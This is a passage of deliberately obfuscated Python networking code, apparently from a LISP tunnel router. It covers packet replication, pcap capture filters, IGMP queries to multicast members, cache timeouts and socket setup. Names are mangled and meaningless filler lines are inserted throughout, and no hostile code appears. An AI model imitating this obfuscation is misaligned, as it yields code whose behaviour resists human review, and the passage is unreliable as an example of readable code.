Ooooo00o0OoO . send_packet ( iIIIIiiIii , Ooooo00o0OoO . outer_dest )
if 58 - 58: Oo0Ooo
elif ( i111i11I1ii ) :
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
ooOooOoOoO = len ( Ooooo00o0OoO . packet )
for ooOOooo0Oo in i111i11I1ii . rle_forwarding_list :
Ooooo00o0OoO . outer_dest . copy_address ( ooOOooo0Oo . address )
Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT if ooOOooo0Oo . translated_port == 0 else ooOOooo0Oo . translated_port
if 66 - 66: Oo0Ooo
if 28 - 28: IiII - IiII . i1IIi - ooOoO0o + I1IiiI . IiII
O0oOOo0o = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = O0oOOo0o
if 54 - 54: OoOoOO00 - I1Ii111
i1i1IiIiIi1Ii = iIiiI1 if ( O0oOOo0o == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 3 - 3: I1IiiI - Oo0Ooo
Ooooo00o0OoO . outer_source . copy_address ( i1i1IiIiIi1Ii )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
O00ooOo = "replicate"
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , reason = O00ooOo , lisp_socket = OOOO0oooo ) == False ) : return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
Ooooo00o0OoO . print_packet ( "Replicate-to-L{}" . format ( ooOOooo0Oo . level ) , True )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . outer_dest )
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
OO00OO0o0 = len ( Ooooo00o0OoO . packet ) - ooOooOoOoO
Ooooo00o0OoO . packet = Ooooo00o0OoO . packet [ OO00OO0o0 : : ]
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
del ( Ooooo00o0OoO )
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
o0O ( Ooo00O0o , "RTR" )
return
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
def I1I1iII1i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
Ooooo00o0OoO = lisp_thread . input_queue . get ( )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
lisp_thread . input_stats . increment ( len ( Ooooo00o0OoO ) )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
lisp_thread . lisp_packet . packet = Ooooo00o0OoO
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
IIIii ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 66 - 66: I1IiiI - IiII
return
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
def o00Ooo0 ( thread ) :
O0O00O = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( O0O00O ) == thread . thread_number )
if 4 - 4: OoOoOO00 + Ii1I / oO0o
if 13 - 13: iII111i
if 80 - 80: Ii1I - o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo - Oo0Ooo * I1IiiI
if 82 - 82: OoO0O00 % o0oOOo0O0Ooo % OOooOOo / O0
if 94 - 94: I1ii11iIi11i + I1ii11iIi11i + OoooooooOO % ooOoO0o
if 7 - 7: iII111i
if 78 - 78: OOooOOo + iII111i . IiII
def Oo ( parms , not_used , packet ) :
if ( o00Ooo0 ( parms [ 1 ] ) == False ) : return
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
I1Iii1I = parms [ 0 ]
iIi11I = parms [ 1 ]
O0Oo = iIi11I . number_of_worker_threads
if 39 - 39: OOooOOo - OoooooooOO + Oo0Ooo
iIi11I . input_stats . increment ( len ( packet ) )
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
o0ooO0OOO = 4 if I1Iii1I == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ o0ooO0OOO : : ]
if 74 - 74: Ii1I * i11iIiiIii / I1Ii111
if 75 - 75: O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if ( O0Oo ) :
oo0 = iIi11I . input_stats . packet_count % O0Oo
oo0 = oo0 + ( len ( I11 ) - O0Oo )
i1iIIi1II1iiI = I11 [ oo0 ]
i1iIIi1II1iiI . input_queue . put ( packet )
else :
iIi11I . lisp_packet . packet = packet
IIIii ( iIi11I . lisp_packet , iIi11I . thread_name )
if 31 - 31: o0oOOo0O0Ooo % I11i + iIii1I11I1II1 + i11iIiiIii * I1Ii111
return
if 45 - 45: OOooOOo * I1Ii111 . ooOoO0o - I1Ii111 + IiII
if 34 - 34: OOooOOo . Oo0Ooo
if 78 - 78: I1ii11iIi11i % I1IiiI / OoooooooOO % OOooOOo - iII111i
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
if 17 - 17: Ii1I
def i1i1IiIi1 ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 22 - 22: I11i * O0 . II111iiii - OoO0O00
I1Iii1I = "lo0" if lisp . lisp_is_macos ( ) else "any"
o0Oo00OO0 = pcappy . open_live ( I1Iii1I , 9000 , 0 , 100 )
if 50 - 50: Ii1I * o0oOOo0O0Ooo % i11iIiiIii
if 96 - 96: I1ii11iIi11i + Oo0Ooo * OoO0O00 % ooOoO0o - O0
if 54 - 54: OoOoOO00 . oO0o % i11iIiiIii / OoooooooOO + IiII % oO0o
if 36 - 36: oO0o
if 74 - 74: OoooooooOO
OoOoO0O = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
OoOoO0O = ( OoOoO0O != "" and OoOoO0O [ 0 ] == " " )
if 100 - 100: O0
o00IiI1iiII1i1i = "(dst host "
i1IiI = ""
for oO00OOoO00 in lisp . lisp_get_all_addresses ( ) :
o00IiI1iiII1i1i += "{} or " . format ( oO00OOoO00 )
i1IiI += "{} or " . format ( oO00OOoO00 )
if 82 - 82: OoOoOO00
o00IiI1iiII1i1i = o00IiI1iiII1i1i [ 0 : - 4 ]
o00IiI1iiII1i1i += ") and ((udp dst port 4341 or 8472 or 4789) or "
o00IiI1iiII1i1i += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
i1IiI = i1IiI [ 0 : - 4 ]
o00IiI1iiII1i1i += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( i1IiI )
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if ( OoOoO0O ) :
o00IiI1iiII1i1i += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( i1IiI )
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
lisp . lprint ( "Capturing packets for: '{}'" . format ( o00IiI1iiII1i1i ) )
o0Oo00OO0 . filter = o00IiI1iiII1i1i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
o0Oo00OO0 . loop ( - 1 , Oo , [ I1Iii1I , lisp_thread ] )
return
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
def O0OOO0 ( lisp_raw_socket , eid , geid , igmp ) :
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
Ooooo00o0OoO = lisp . lisp_packet ( igmp )
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( eid , geid )
if ( O00o0OO0000oo == None ) : return
if ( O00o0OO0000oo . rloc_set == [ ] ) : return
if ( O00o0OO0000oo . rloc_set [ 0 ] . rle == None ) : return
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
oO00o = eid . print_address_no_iid ( )
for oO0oOo0 in O00o0OO0000oo . rloc_set [ 0 ] . rle . rle_nodes :
if ( oO0oOo0 . rloc_name == oO00o ) :
Ooooo00o0OoO . outer_dest . copy_address ( oO0oOo0 . address )
Ooooo00o0OoO . encap_port = oO0oOo0 . translated_port
break
if 36 - 36: I1Ii111 . II111iiii % ooOoO0o
if 84 - 84: OoooooooOO - i11iIiiIii / iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i
if ( Ooooo00o0OoO . outer_dest . is_null ( ) ) : return
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
Ooooo00o0OoO . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . outer_version = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_ttl = 32
Ooooo00o0OoO . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
Ooooo00o0OoO . inner_ttl = 1
if 17 - 17: OoO0O00 * OoOoOO00
iiI111I1iIiI = lisp . green ( eid . print_address ( ) , False )
O00ooOo = lisp . red ( "{}:{}" . format ( Ooooo00o0OoO . outer_dest . print_address_no_iid ( ) ,
Ooooo00o0OoO . encap_port ) , False )
ii11i = lisp . bold ( "IGMP Query" , False )
if 71 - 71: I1Ii111 / I1ii11iIi11i * iIii1I11I1II1
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( ii11i , iiI111I1iIiI , O00ooOo ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Send" , True )
if 37 - 37: Oo0Ooo / IiII * O0
Ooooo00o0OoO . send_packet ( lisp_raw_socket , Ooooo00o0OoO . outer_dest )
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if 48 - 48: iII111i + IiII
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
def IIi1ii1 ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 48 - 48: ooOoO0o / iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . OoO0O00
if 60 - 60: I1Ii111
if 98 - 98: ooOoO0o
if 34 - 34: iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
iiiii11I1 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
Ii1 = lisp . lisp_myrlocs [ 0 ]
iII1 = Ii1 . address
iiiii11I1 += chr ( ( iII1 >> 24 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 16 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 8 ) & 0xff )
iiiii11I1 += chr ( iII1 & 0xff )
iiiii11I1 += "\xe0\x00\x00\x01"
iiiii11I1 += "\x94\x04\x00\x00"
iiiii11I1 = lisp . lisp_ip_checksum ( iiiii11I1 , 24 )
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
I1i11II = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
I1i11II = lisp . lisp_igmp_checksum ( I1i11II )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1 . store_address ( iI1ii11Ii )
i1I11IiI1iiII , o00oOo0oOoo , O0OO0OO = lisp . lisp_allow_gleaning ( o0oOO000oO0oo , i1 , None )
if ( O0OO0OO == False ) : continue
O0OOO0 ( lisp_raw_socket , o0oOO000oO0oo , i1 , iiiii11I1 + I1i11II )
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
if 53 - 53: I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
if 38 - 38: OoO0O00 / ooOoO0o % I1Ii111 * I11i + i11iIiiIii % ooOoO0o
if 61 - 61: I1Ii111 - Ii1I % I1ii11iIi11i / ooOoO0o / iII111i + iIii1I11I1II1
def O0O0oo ( ) :
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 83 - 83: IiII / I1Ii111
OOo000OO000 = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
OOOO00OooO = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ iI1ii11Ii ]
OOO = time . time ( ) - OOOO00OooO
if ( OOO < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
OOo000OO000 . append ( [ Ii1iIiII1ii1 , iI1ii11Ii ] )
if 32 - 32: OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
ooooO0 = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , iI1ii11Ii in OOo000OO000 :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
i1 . store_address ( iI1ii11Ii )
iiI111I1iIiI = lisp . green ( Ii1iIiII1ii1 , False )
Iiii111 = lisp . green ( iI1ii11Ii , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( iiI111I1iIiI , ooooO0 , Iiii111 ) )
lisp . lisp_remove_gleaned_multicast ( o0oOO000oO0oo , i1 )
if 71 - 71: O0 / I1IiiI . I1Ii111 / I1Ii111 * ooOoO0o
if 60 - 60: II111iiii . I1IiiI - Oo0Ooo + I1ii11iIi11i * I1ii11iIi11i
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
def ii1II1II ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 42 - 42: Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
for oOo0oO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for O0o in oOo0oO : del ( O0o )
if 78 - 78: OOooOOo % iIii1I11I1II1
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 50 - 50: I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
O0O0oo ( )
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
IIi1ii1 ( lisp_raw_socket )
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ lisp_raw_socket ] )
Oooo0000 . start ( )
return
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
def iIIi1Ii1III ( ) :
global Oo0oO0oo0oO00 , II1iII1i , II1Ii1iI1i
global OOo , Ii1IIii11 , I11
global i111I , oO0oIIII
global iIiiI1
if 86 - 86: i11iIiiIii + i11iIiiIii . I1Ii111 % I1IiiI . ooOoO0o
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 17 - 17: Ii1I
if 67 - 67: O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
iIiiI1 = lisp . lisp_get_interface_address ( "eth0" )
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
i1iI1i = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
II1Ii1iI1i = lisp . lisp_open_listen_socket ( i1iI1i ,
str ( iiI1iIiI ) )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
i111I = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 59 - 59: IiII
II1iII1i [ 0 ] = II1Ii1iI1i
if 89 - 89: OoOoOO00 % iIii1I11I1II1
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
II1iII1i [ 2 ] = Oo0oO0oo0oO00
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
OOo = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
OOo . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
II1iII1i . append ( OOo )
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
oO0oIIII = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
